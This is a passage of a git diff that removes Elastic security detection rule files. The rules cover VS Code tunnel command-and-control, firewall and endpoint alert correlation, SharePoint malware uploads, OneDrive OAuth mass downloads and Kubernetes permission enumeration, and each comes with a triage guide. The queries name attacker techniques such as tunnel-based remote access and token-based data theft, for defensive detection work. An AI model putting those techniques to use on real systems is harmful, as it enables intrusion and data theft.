exclusions for these sessions by tagging them with specific event identifiers or user roles.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Terminate any suspicious VScode processes identified by the detection rule to halt potential command and control activities.\n- Conduct a thorough review of system logs and process histories to identify any additional indicators of compromise or lateral movement attempts.\n- Reset credentials and access tokens associated with the affected system and any connected services to mitigate unauthorized access.\n- Restore the system from a known good backup if any unauthorized changes or malware are detected.\n- Implement network segmentation to limit the ability of similar threats to spread across the environment.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : \"tunnel\" and\n (process.args : \"--accept-server-license-terms\" or\n process.name : \"code*.exe\" or\n ?process.code_signature.subject_name : \"Microsoft Corporation\" or\n process.executable : (\"?:\\\\ProgramData\\\\*\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\windows\\\\debug\\\\*\", \n \"\\\\Device\\\\HarddiskVolume*\\\\Users\\\\Public\\\\*\", \"\\\\Device\\\\HarddiskVolume*\\\\ProgramData\\\\*\", \"\\\\Device\\\\HarddiskVolume*\\\\windows\\\\debug\\\\*\")) and\n not (process.name == \"code-tunnel.exe\" and process.args == \"status\" and process.parent.name == \"Code.exe\")\n", + "references": [ + "https://badoption.eu/blog/2023/01/31/code_c2.html", + "https://code.visualstudio.com/docs/remote/tunnels" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0b96dfd8-5b8c-4485-9a1c-69ff7839786a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3.json b/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3.json deleted file mode 100644 index ce683bee62e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3.json +++ /dev/null @@ -1,126 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule correlate any Elastic Defend alert with a set of suspicious events from Network security devices like Palo Alto Networks (PANW) and Fortinet Fortigate by host.ip and source.ip. This may indicate that this host is compromised and triggering multi-datasource alerts.", - "from": "now-60m", - "interval": "10m", - "language": "esql", - "license": "Elastic License v2", - "name": "Elastic Defend and Network Security Alerts Correlation", - "note": "## Triage and analysis\n\n### Investigating Elastic Defend and Network Security Alerts Correlation\n\nThis rule correlate any Elastic Defend alert with suspicious events from Network Security datasources like Palo Alto Networks (PANW), Fortinet Fortigate and Suricata by host.ip and source.ip.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific host and users involved.\n- Investiguate the network alerts by destination.ip and message.\n- Examine the timeline of the alerts to understand the sequence of events and determine if there is a pattern or progression in the tactics used.\n- Correlate the alert data with other logs and telemetry from the host, such as process creation, network connections, and file modifications, to gather additional context.\n- Check for any indicators of compromise (IOCs) associated with the alerts, such as suspicious IP addresses, domains, or file hashes, and search for these across the network.\n- Assess the impact and scope of the potential compromise by determining if other hosts or systems have similar alerts or related activity.\n\n### False positive analysis\n\n- IP address ranges overlap where the host.ip value from the Elastic Defend alert is unrelated to the source.ip value from the Network Security alert.\n- Alerts from routine administrative tasks may trigger multiple alerts. Review and exclude known benign activities such as scheduled software updates or system maintenance.\n- Security tools running on the host might generate alerts across different tactics. Identify and exclude alerts from trusted security applications to reduce noise.\n- Automated scripts or batch processes can mimic adversarial behavior. Analyze and whitelist these processes if they are verified as non-threatening.\n- Frequent alerts from development or testing environments can be misleading. Consider excluding these environments from the rule or applying a different risk score.\n- User behavior anomalies, such as accessing multiple systems or applications, might trigger alerts. Implement user behavior baselines to differentiate between normal and suspicious activities.\n\n### Response and remediation\n\n- Isolate the affected host from the network immediately to prevent further lateral movement by the adversary.\n- Conduct a thorough forensic analysis of the host to identify the specific vulnerabilities exploited and gather evidence of the attack phases involved.\n- Remove any identified malicious software or unauthorized access tools from the host, ensuring all persistence mechanisms are eradicated.\n- Apply security patches and updates to the host to address any exploited vulnerabilities and prevent similar attacks.\n- Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise.\n- Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns.\n- Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.", - "query": "FROM logs-* metadata _id\n| WHERE\n // Elastic Defend Alerts\n (event.module == \"endpoint\" and event.dataset == \"endpoint.alerts\") or\n\n // PANW suspicious events\n (event.dataset == \"panw.panos\" and\n event.action in (\"virus_detected\", \"wildfire_virus_detected\", \"c2_communication\", \"spyware_detected\", \"large_upload\", \"denied\", \"exploit_detected\")) or\n\n // Fortigate suspicious events\n (event.dataset == \"fortinet_fortigate.log\" and\n (event.action in (\"outbreak-prevention\", \"infected\", \"blocked\") or message like \"backdoor*\" or message like \"Proxy*\" or message like \"anomaly*\" or message like \"P2P*\" or message like \"misc*\" or message like \"DNS.Over.HTTPS\" or message like \"Remote.Access\")) or\n\n // Suricata\n (event.dataset == \"suricata.eve\" and message in (\"Command and Control Traffic\", \"Potentially Bad Traffic\", \"A Network Trojan was detected\", \"Detection of a Network Scan\", \"Domain Observed Used for C2 Detected\", \"Malware Command and Control Activity Detected\"))\n\n// extract source.ip from PANW or Fortigate events and host.ip from Elastic Defend alert\n|eval fw_alert_source_ip = CASE(event.dataset in (\"panw.panos\", \"fortinet_fortigate.log\"), source.ip, null),\n elastic_defend_alert_host_ip = CASE(event.module == \"endpoint\" and event.dataset == \"endpoint.alerts\", host.ip, null)\n| eval Esql.source_ip = COALESCE(fw_alert_source_ip, elastic_defend_alert_host_ip)\n| where Esql.source_ip is not null\n\n// group by host_source_ip shared between FG/PANW and Elastic Defend\n| stats Esql.alerts_count = COUNT(*),\n Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),\n Esql.message_values_distinct_count = COUNT_DISTINCT(message),\n Esql.event_module_values = VALUES(event.module),\n Esql.message_values = VALUES(message),\n Esql.event_action_values = VALUES(event.action),\n Esql.process_executable_values = VALUES(process.executable),\n Esql.process_hash_sha256_values = VALUES(process.hash.sha256),\n Esql.process_cmdline_values = VALUES(process.command_line),\n Esql.file_path_values = VALUES(file.path),\n Esql.file_hash_sha256_values = VALUES(file.hash.sha256),\n Esql.host_id_values = VALUES(host.id),\n Esql.user_name_values = VALUES(user.name),\n Esql.destination_ip_values = VALUES(destination.ip)\n by Esql.source_ip\n| where Esql.event_module_distinct_count >= 2 AND Esql.message_values_distinct_count >= 2\n| eval concat_module_values = MV_CONCAT(Esql.event_module_values, \",\")\n// Make sure an endpoint alert is present along one of the network ones\n| where concat_module_values like \"*endpoint*\"\n| keep Esql.*\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "panw", - "version": "^5.0.0" - }, - { - "package": "fortinet_fortigate", - "version": "^1.0.0" - }, - { - "package": "suricata", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.alerts_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.destination_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.event_action_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.event_module_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.event_module_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_hash_sha256_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.file_path_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.host_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.message_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.message_values_distinct_count", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.process_cmdline_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_executable_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.process_hash_sha256_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.source_ip", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.user_name_values", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Fortinet", - "Data Source: PAN-OS" - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 3 - }, - "id": "0bca7e73-e1b5-4fb2-801b-9b5f5be20dfe_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d160033-fab7-4e72-85a3-3a9d80c8bff7_4.json b/packages/security_detection_engine/kibana/security_rule/0d160033-fab7-4e72-85a3-3a9d80c8bff7_4.json deleted file mode 100644 index 3fed6796c9b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0d160033-fab7-4e72-85a3-3a9d80c8bff7_4.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule uses alert data to determine when multiple different alerts involving the same user are triggered. Analysts can use this to prioritize triage and response, as these users are more likely to be compromised.", - "false_positives": [ - "False positives can occur with Generic built-in accounts, such as Administrator, admin, etc. if they are widespread used in your environment. As a best practice, they shouldn't be used in day-to-day tasks, as it prevents the ability to quickly identify and contact the account owner to find out if an alert is a planned activity, regular business activity, or an upcoming incident." - ], - "from": "now-24h", - "index": [ - ".alerts-security.*" - ], - "interval": "1h", - "language": "kuery", - "license": "Elastic License v2", - "name": "Multiple Alerts Involving a User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Multiple Alerts Involving a User\n\nIn security environments, monitoring user activity is crucial as adversaries often exploit user accounts to gain unauthorized access. Attackers may trigger multiple alerts by performing suspicious actions under a compromised user account. The detection rule identifies such patterns by correlating diverse alerts linked to the same user, excluding known system accounts, thus prioritizing potential threats for analysts.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific user account involved, focusing on the user.name field to gather initial context about the user.\n- Examine the timeline and sequence of the triggered alerts to understand the pattern of activity associated with the user, noting any unusual or unexpected actions.\n- Cross-reference the user activity with known legitimate activities or scheduled tasks to rule out false positives, ensuring that the actions are not part of normal operations.\n- Investigate the source and destination IP addresses associated with the alerts to identify any suspicious or unauthorized access points.\n- Check for any recent changes in user permissions or group memberships that could indicate privilege escalation attempts.\n- Look into any recent login attempts or authentication failures for the user account to detect potential brute force or credential stuffing attacks.\n- Collaborate with the user or their manager to verify if the activities were authorized or if the account might be compromised.\n\n### False positive analysis\n\n- Alerts triggered by automated system processes or scripts that mimic user behavior can be false positives. To manage these, identify and exclude known benign scripts or processes from the rule.\n- Frequent alerts from users in roles that inherently require access to multiple systems or sensitive data, such as IT administrators, may not indicate compromise. Implement role-based exceptions to reduce noise.\n- Alerts generated by legitimate software updates or maintenance activities can be mistaken for suspicious behavior. Schedule these activities during known maintenance windows and exclude them from the rule during these times.\n- Users involved in testing or development environments may trigger multiple alerts due to their work nature. Create exceptions for these environments to prevent unnecessary alerts.\n- High-volume users, such as those in customer support or sales, may naturally generate more alerts. Monitor these users separately and adjust the rule to focus on unusual patterns rather than volume alone.\n\n### Response and remediation\n\n- Isolate the affected user account immediately to prevent further unauthorized access. Disable the account or change the password to stop any ongoing malicious activity.\n- Conduct a thorough review of the affected user's recent activities and access logs to identify any unauthorized actions or data access. This will help in understanding the scope of the compromise.\n- Remove any malicious software or unauthorized tools that may have been installed on the user's system. Use endpoint detection and response (EDR) tools to scan and clean the system.\n- Restore any altered or deleted data from backups, ensuring that the restored data is free from any malicious modifications.\n- Notify relevant stakeholders, including IT security teams and management, about the incident and the steps being taken to address it. This ensures that everyone is aware and can provide support if needed.\n- Implement additional monitoring on the affected user account and related systems to detect any further suspicious activities. This includes setting up alerts for unusual login attempts or data access patterns.\n- Review and update access controls and permissions for the affected user and similar accounts to prevent future incidents. Ensure that least privilege principles are applied.", - "query": "signal.rule.name:* and user.name:* and not user.id:(\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\")\n", - "required_fields": [ - { - "ecs": false, - "name": "signal.rule.name", - "type": "unknown" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0d160033-fab7-4e72-85a3-3a9d80c8bff7", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Rule Type: Higher-Order Rule", - "Resources: Investigation Guide" - ], - "threshold": { - "cardinality": [ - { - "field": "signal.rule.rule_id", - "value": 5 - } - ], - "field": [ - "user.name" - ], - "value": 1 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 4 - }, - "id": "0d160033-fab7-4e72-85a3-3a9d80c8bff7_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_209.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_209.json deleted file mode 100644 index 9cb770cb244..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_209.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "SharePoint Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating SharePoint Malware File Upload\n\nSharePoint, a collaborative platform, facilitates file sharing and storage within organizations. Adversaries exploit this by uploading malware, leveraging the platform's sharing capabilities to propagate threats laterally. The detection rule identifies when SharePoint's file scanning engine flags an upload as malicious, focusing on specific audit events to alert security teams of potential lateral movement threats.\n\n### Possible investigation steps\n\n- Review the specific event details in the alert, focusing on the event.dataset, event.provider, event.code, and event.action fields to confirm the alert is related to a SharePoint file upload flagged as malware.\n- Identify the user account associated with the file upload by examining the audit logs and determine if the account has a history of suspicious activity or if it has been compromised.\n- Analyze the file metadata, including the file name, type, and size, to gather more context about the nature of the uploaded file and assess its potential impact.\n- Check the file's sharing permissions and access history to identify other users or systems that may have interacted with the file, assessing the risk of lateral movement.\n- Investigate the source of the file upload, such as the originating IP address or device, to determine if it aligns with known malicious activity or if it is an anomaly for the user.\n- Coordinate with the IT team to isolate affected systems or accounts if necessary, and initiate a response plan to mitigate any potential spread of the malware within the organization.\n\n### False positive analysis\n\n- Legitimate software updates or patches uploaded to SharePoint may be flagged as malware. To handle this, create exceptions for known update files by verifying their source and hash.\n- Internal security tools or scripts used for testing purposes might trigger false positives. Maintain a list of these tools and exclude them from alerts after confirming their legitimacy.\n- Files with encrypted content, such as password-protected documents, can be mistakenly identified as malicious. Implement a process to review and whitelist these files if they are from trusted sources.\n- Large batch uploads from trusted departments, like IT or HR, may occasionally be flagged. Establish a review protocol for these uploads and whitelist them if they are verified as safe.\n- Files with macros or executable content used in legitimate business processes might be detected. Work with relevant departments to identify and exclude these files from alerts after thorough validation.\n\n### Response and remediation\n\n- Immediately isolate the affected SharePoint site or library to prevent further access and sharing of the malicious file. This can be done by restricting permissions or temporarily disabling access to the site.\n- Notify the security operations team and relevant stakeholders about the detected malware to ensure awareness and initiate a coordinated response.\n- Quarantine the identified malicious file to prevent it from being accessed or executed by users. Use SharePoint's built-in capabilities or integrated security tools to move the file to a secure location.\n- Conduct a thorough scan of the affected SharePoint site and connected systems to identify any additional malicious files or indicators of compromise. Use advanced threat detection tools to ensure comprehensive coverage.\n- Review and revoke any unauthorized access or sharing permissions that may have been granted to the malicious file, ensuring that only legitimate users have access to sensitive data.\n- Escalate the incident to the incident response team if there are signs of lateral movement or if the malware has spread to other parts of the network, following the organization's escalation protocols.\n- Implement enhanced monitoring and logging for SharePoint and related services to detect any future attempts to upload or share malicious files, leveraging the specific query fields used in the detection rule.", - "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": "https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json deleted file mode 100644 index 9ea64e1df40..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json +++ /dev/null @@ -1,72 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive.", - "false_positives": [ - "Legitimate users may download files from OneDrive using OAuth authentication. Ensure that the downloads are authorized and the user is known before taking action." - ], - "from": "now-9m", - "interval": "8m", - "language": "esql", - "license": "Elastic License v2", - "name": "M365 OneDrive Excessive File Downloads with OAuth Token", - "note": "## Triage and Analysis\n\n### Investigating M365 OneDrive Excessive File Downloads with OAuth Token\n\nThis rule detects an excessive number of files downloaded from OneDrive using OAuth authentication. Threat actors may use OAuth phishing attacks, such as **Device Code Authentication phishing**, to obtain valid access tokens and perform unauthorized data exfiltration. This method allows adversaries to bypass traditional authentication mechanisms, making it a stealthy and effective technique.\n\nThis rule leverages ESQL aggregations which limit the field values available in the alert document. To investigate further, it is recommended to identify the original documents ingested.\n\n#### Possible Investigation Steps\n\n- Review the `o365.audit.UserId` field to identify the user who performed the downloads. Check if this user typically downloads large amounts of data from OneDrive.\n- Correlate `o365.audit.UserId` with Entra Sign-In logs to verify the authentication method used and determine if it was expected for this user.\n- Review the authentication method used. If OAuth authentication was used, investigate whether it was expected for this user.\n- Identify the client application used for authentication. Determine if it is a legitimate enterprise-approved app or an unauthorized third-party application.\n- Check the number of unique files downloaded. If a user downloads a high volume of unique files in a short period, it may indicate data exfiltration.\n- Analyze the file types and directories accessed to determine if sensitive or confidential data was involved.\n- Investigate the source IP address and geolocation of the download activity. If it originates from an unusual or anonymized location, further scrutiny is needed.\n- Review other recent activities from the same user, such as file access, sharing, or permission changes, that may indicate further compromise.\n- Check for signs of session persistence using OAuth. If Azure sign-in logs are correlated where `authentication_protocol` or `originalTransferMethod` field shows `deviceCode`, the session was established through device code authentication.\n- Look for multiple authentication attempts from different devices or locations within a short timeframe, which could indicate unauthorized access.\n- Investigate if other OAuth-related anomalies exist, such as consent grants for unfamiliar applications or unexpected refresh token activity.\n- Review the `file.directory` value from the original documents to identify the specific folders or paths where the files were downloaded.\n\n### False Positive Analysis\n\n- Verify if the user regularly downloads large batches of files as part of their job function.\n- Determine if the downloads were triggered by an authorized automated process, such as a data backup or synchronization tool.\n- Confirm if the detected OAuth application is approved for enterprise use and aligns with expected usage patterns.\n\n### Response and Remediation\n\n- If unauthorized activity is confirmed, revoke the OAuth token used and terminate active OneDrive sessions.\n- Reset the affected user's password and require reauthentication to prevent continued unauthorized access.\n- Restrict OAuth app permissions and enforce conditional access policies to limit authentication to trusted devices and applications.\n- Monitor for additional signs of compromise, such as unusual email forwarding rules, external sharing of OneDrive files, or privilege escalation attempts.\n- Educate users on OAuth phishing risks and encourage the use of **Microsoft Defender for Office 365 Safe Links** to mitigate credential-based attacks.\n- Enable continuous monitoring for OAuth authentication anomalies using **Microsoft Entra ID sign-in logs** and security tools.\n", - "query": "from logs-o365.audit-*\n| where\n @timestamp > now() - 14d and\n event.dataset == \"o365.audit\" and\n event.provider == \"OneDrive\" and\n event.action == \"FileDownloaded\" and\n o365.audit.AuthenticationType == \"OAuth\" and\n event.outcome == \"success\"\n| eval\n Esql.time_window_date_trunc = date_trunc(1 minutes, @timestamp)\n| keep\n Esql.time_window_date_trunc,\n o365.audit.UserId,\n file.name,\n source.ip\n| stats\n Esql.file_name_count_distinct = count_distinct(file.name),\n Esql.event_count = count(*)\n by\n Esql.time_window_date_trunc,\n o365.audit.UserId,\n source.ip\n| where\n Esql.file_name_count_distinct >= 25\n", - "references": [ - "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "risk_score": 47, - "rule_id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: SharePoint", - "Data Source: OneDrive", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 4 - }, - "id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_206.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_206.json deleted file mode 100644 index 86a7d4d2665..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_206.json +++ /dev/null @@ -1,93 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a service account or node attempts to enumerate their own permissions via the selfsubjectaccessreview or selfsubjectrulesreview APIs. This is highly unusual behavior for non-human identities like service accounts and nodes. An adversary may have gained access to credentials/tokens and this could be an attempt to determine what privileges they have to facilitate further movement or execution within the cluster.", - "false_positives": [ - "An administrator may submit this request as an \"impersonatedUser\" to determine what privileges a particular service account has been granted. However, an adversary may utilize the same technique as a means to determine the privileges of another token other than that of the compromised account." - ], - "index": [ - "logs-kubernetes.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Suspicious Self-Subject Review", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Suspicious Self-Subject Review\n\nKubernetes uses APIs like selfsubjectaccessreview and selfsubjectrulesreview to allow entities to check their own permissions. While useful for debugging, adversaries can exploit these APIs to assess their access level after compromising service accounts or nodes. The detection rule identifies unusual API calls by non-human identities, flagging potential unauthorized privilege enumeration attempts.\n\n### Possible investigation steps\n\n- Review the Kubernetes audit logs to identify the specific service account or node that triggered the alert by examining the kubernetes.audit.user.username or kubernetes.audit.impersonatedUser.username fields.\n- Check the context of the API call by analyzing the kubernetes.audit.objectRef.resource field to confirm whether it involved selfsubjectaccessreviews or selfsubjectrulesreviews.\n- Investigate the source of the API request by looking at the IP address and user agent in the audit logs to determine if the request originated from a known or expected source.\n- Assess the recent activity of the implicated service account or node to identify any unusual patterns or deviations from normal behavior.\n- Verify if there have been any recent changes to the permissions or roles associated with the service account or node to understand if the access level has been altered.\n- Cross-reference the alert with any other security events or alerts in the environment to determine if this is part of a broader attack or compromise.\n\n### False positive analysis\n\n- Service accounts used for automated tasks may trigger this rule if they are programmed to check permissions as part of their routine operations. To handle this, identify these accounts and create exceptions for their specific API calls.\n- Nodes performing legitimate self-assessment for compliance or security checks might be flagged. Review the node's purpose and, if necessary, whitelist these actions in the detection rule.\n- Development or testing environments where permissions are frequently checked by service accounts can generate false positives. Consider excluding these environments from the rule or adjusting the rule's sensitivity for these specific contexts.\n- Regularly scheduled jobs or scripts that include permission checks as part of their execution may cause alerts. Document these jobs and adjust the rule to ignore these specific, non-threatening behaviors.\n\n### Response and remediation\n\n- Immediately isolate the compromised service account or node by revoking its access tokens and credentials to prevent further unauthorized actions within the cluster.\n- Conduct a thorough review of the audit logs to identify any other suspicious activities or access patterns associated with the compromised identity, focusing on any lateral movement or privilege escalation attempts.\n- Rotate credentials and tokens for all service accounts and nodes that may have been exposed or compromised, ensuring that new credentials are distributed securely.\n- Implement network segmentation and access controls to limit the ability of compromised identities to interact with sensitive resources or other parts of the cluster.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been affected.\n- Enhance monitoring and alerting for similar suspicious activities by tuning detection systems to recognize patterns of unauthorized privilege enumeration attempts.\n- Review and update Kubernetes role-based access control (RBAC) policies to ensure that service accounts and nodes have the minimum necessary permissions, reducing the risk of privilege abuse.", - "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb:\"create\"\n and kubernetes.audit.objectRef.resource:(\"selfsubjectaccessreviews\" or \"selfsubjectrulesreviews\")\n and (kubernetes.audit.user.username:(system\\:serviceaccount\\:* or system\\:node\\:*)\n or kubernetes.audit.impersonatedUser.username:(system\\:serviceaccount\\:* or system\\:node\\:*))\n", - "references": [ - "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms", - "https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access", - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/detecting-identity-attacks-in-kubernetes/ba-p/3232340" - ], - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.impersonatedUser.username", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.objectRef.resource", - "type": "keyword" - }, - { - "ecs": 